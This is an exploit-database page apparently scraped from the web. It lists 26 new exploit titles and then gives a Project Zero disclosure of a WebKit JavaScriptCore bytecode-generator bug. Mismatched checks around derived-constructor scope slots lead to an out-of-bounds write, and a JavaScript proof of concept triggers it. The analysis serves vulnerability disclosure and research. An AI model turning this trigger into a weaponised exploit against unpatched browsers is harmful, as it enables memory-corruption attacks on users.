42e94b4366
26 new exploits Microsoft MsMpEng - Remotely Exploitable Use-After-Free due to Design Issue in GC Engine Microsoft MsMpEng - Multiple Crashes While Scanning Malformed Files Microsoft MsMpEng - Use-After-Free via Saved Callers WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope WebKit - 'Element::setAttributeNodeNS' Use-After-Free reiserfstune 3.6.25 - Local Buffer Overflow TiEmu 2.08 - Local Buffer Overflow Octopus Deploy - Authenticated Code Execution (Metasploit) Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit) CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes) Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes) uc-http Daemon - Local File Inclusion / Directory Traversal Trend Micro Deep Security version 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow WordPress Plugin Huge-IT Video Gallery 2.0.4 - SQL Injection TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root Piwigo Plugin Facetag 0.0.3 - SQL Injection OV3 Online Administration 3.0 - Directory Traversal OV3 Online Administration 3.0 - Remote Code Execution OV3 Online Administration 3.0 - SQL Injection Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
96 lines
No EOL
3.6 KiB
JavaScript
Executable file
96 lines
No EOL
3.6 KiB
JavaScript
Executable file
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1173
|
|
|
|
When a super expression is used in an arrow function, the following code, which generates bytecode, is called.
|
|
|
|
if (needsToUpdateArrowFunctionContext() && !codeBlock->isArrowFunction()) {
|
|
bool canReuseLexicalEnvironment = isSimpleParameterList;
|
|
initializeArrowFunctionContextScopeIfNeeded(functionSymbolTable, canReuseLexicalEnvironment);
|
|
emitPutThisToArrowFunctionContextScope();
|
|
emitPutNewTargetToArrowFunctionContextScope();
|
|
emitPutDerivedConstructorToArrowFunctionContextScope();
|
|
}
|
|
|
|
Here's |emitPutDerivedConstructorToArrowFunctionContextScope|.
|
|
|
|
void BytecodeGenerator::emitPutDerivedConstructorToArrowFunctionContextScope()
|
|
{
|
|
if ((isConstructor() && constructorKind() == ConstructorKind::Extends) || m_codeBlock->isClassContext()) {
|
|
if (isSuperUsedInInnerArrowFunction()) {
|
|
ASSERT(m_arrowFunctionContextLexicalEnvironmentRegister);
|
|
|
|
Variable protoScope = variable(propertyNames().builtinNames().derivedConstructorPrivateName());
|
|
emitPutToScope(m_arrowFunctionContextLexicalEnvironmentRegister, protoScope, &m_calleeRegister, DoNotThrowIfNotFound, InitializationMode::Initialization);
|
|
}
|
|
}
|
|
}
|
|
|
|
|emitPutToScope| is directly called without resolving the scope. This means the scope |m_arrowFunctionContextLexicalEnvironmentRegister| must have a place for |derivedConstructorPrivateName|. And that place is secured in the following method.
|
|
|
|
void BytecodeGenerator::initializeArrowFunctionContextScopeIfNeeded(SymbolTable* functionSymbolTable, bool canReuseLexicalEnvironment)
|
|
{
|
|
ASSERT(!m_arrowFunctionContextLexicalEnvironmentRegister);
|
|
|
|
if (canReuseLexicalEnvironment && m_lexicalEnvironmentRegister) {
|
|
...
|
|
if (isConstructor() && constructorKind() == ConstructorKind::Extends && isSuperUsedInInnerArrowFunction()) {
|
|
offset = functionSymbolTable->takeNextScopeOffset(NoLockingNecessary);
|
|
functionSymbolTable->set(NoLockingNecessary, propertyNames().builtinNames().derivedConstructorPrivateName().impl(), SymbolTableEntry(VarOffset(offset)));
|
|
}
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
But the problem is that the checks in |emitPutDerivedConstructorToArrowFunctionContextScope| and |initializeArrowFunctionContextScopeIfNeeded| are slightly diffrent.
|
|
|
|
BytecodeGenerator::initializeArrowFunctionContextScopeIfNeeded:
|
|
if (isConstructor() && constructorKind() == ConstructorKind::Extends && isSuperUsedInInnerArrowFunction())
|
|
|
|
BytecodeGenerator::emitPutDerivedConstructorToArrowFunctionContextScope:
|
|
if ((isConstructor() && constructorKind() == ConstructorKind::Extends) || m_codeBlock->isClassContext()) {
|
|
if (isSuperUsedInInnerArrowFunction()) {
|
|
|
|
Note: " || m_codeBlock->isClassContext()".
|
|
|
|
So, in a certain case, it fails to secure the place for |derivedConstructorPrivateName|, but |emitPutToScope| is called, which results in an OOB write.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
let args = new Array(0x10000);
|
|
args.fill();
|
|
args = args.map((_, i) => 'a' + i).join(', ');
|
|
|
|
let gun = eval(`(function () {
|
|
class A {
|
|
|
|
}
|
|
|
|
class B extends A {
|
|
constructor(${args}) {
|
|
() => {
|
|
${args};
|
|
super();
|
|
};
|
|
|
|
class C {
|
|
constructor() {
|
|
}
|
|
|
|
trigger() {
|
|
(() => {
|
|
super.x;
|
|
})();
|
|
}
|
|
}
|
|
|
|
return new C();
|
|
}
|
|
}
|
|
|
|
return new B();
|
|
})()`);
|
|
|
|
for (let i = 0; i < 0x10000; i++)
|
|
gun.trigger(); |